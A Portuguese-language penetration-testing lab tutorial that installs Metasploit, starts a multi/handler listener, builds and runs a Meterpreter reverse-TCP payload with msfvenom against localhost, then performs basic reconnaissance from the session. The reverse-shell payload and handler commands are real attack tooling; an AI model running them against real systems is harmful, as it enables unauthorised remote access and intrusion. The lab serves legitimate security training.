Identificar um serviço na rede interna de um alvo
Nesta etapa, simularemos a obtenção de uma sessão Meterpreter em uma máquina alvo. Em um cenário real, isso seria alcançado explorando uma vulnerabilidade. Para este laboratório, configuraremos um listener no Metasploit e executaremos manualmente um payload para conectar a ele. Isso nos permite focar na fase de pós-exploração.
Primeiro, precisamos instalar o Metasploit Framework.
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall
chmod 755 msfinstall
sudo ./msfinstall
Em seguida, abra um terminal e inicie o console do Metasploit.
msfconsole -q
Dentro do msfconsole, configuraremos um handler para escutar conexões de entrada.
use multi/handler
set payload linux/x64/meterpreter/reverse_tcp
set LHOST 127.0.0.1
set LPORT 4444
exploit -j
Agora, abra um novo terminal (você pode usar o botão "+" na aba do terminal). Neste novo terminal, geraremos e executaremos um payload para conectar de volta ao nosso listener.
msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f elf -o shell.elf
chmod +x shell.elf
./shell.elf
Volte para o seu primeiro terminal com o msfconsole. Você deverá ver uma mensagem indicando que uma nova sessão foi aberta. Vamos interagir com ela.
sessions -l
sessions -i 1
Você agora está em uma sessão Meterpreter. Um primeiro passo comum é realizar reconhecimento. Vamos verificar as interfaces de rede do host "comprometido".
ifconfig
Você verá várias interfaces de rede. Para este laboratório, assumiremos que, através de escaneamentos adicionais (que estão além do escopo deste laboratório), descobrimos um serviço web rodando em 127.0.0.1 na porta 8080. Nosso objetivo é acessar este serviço.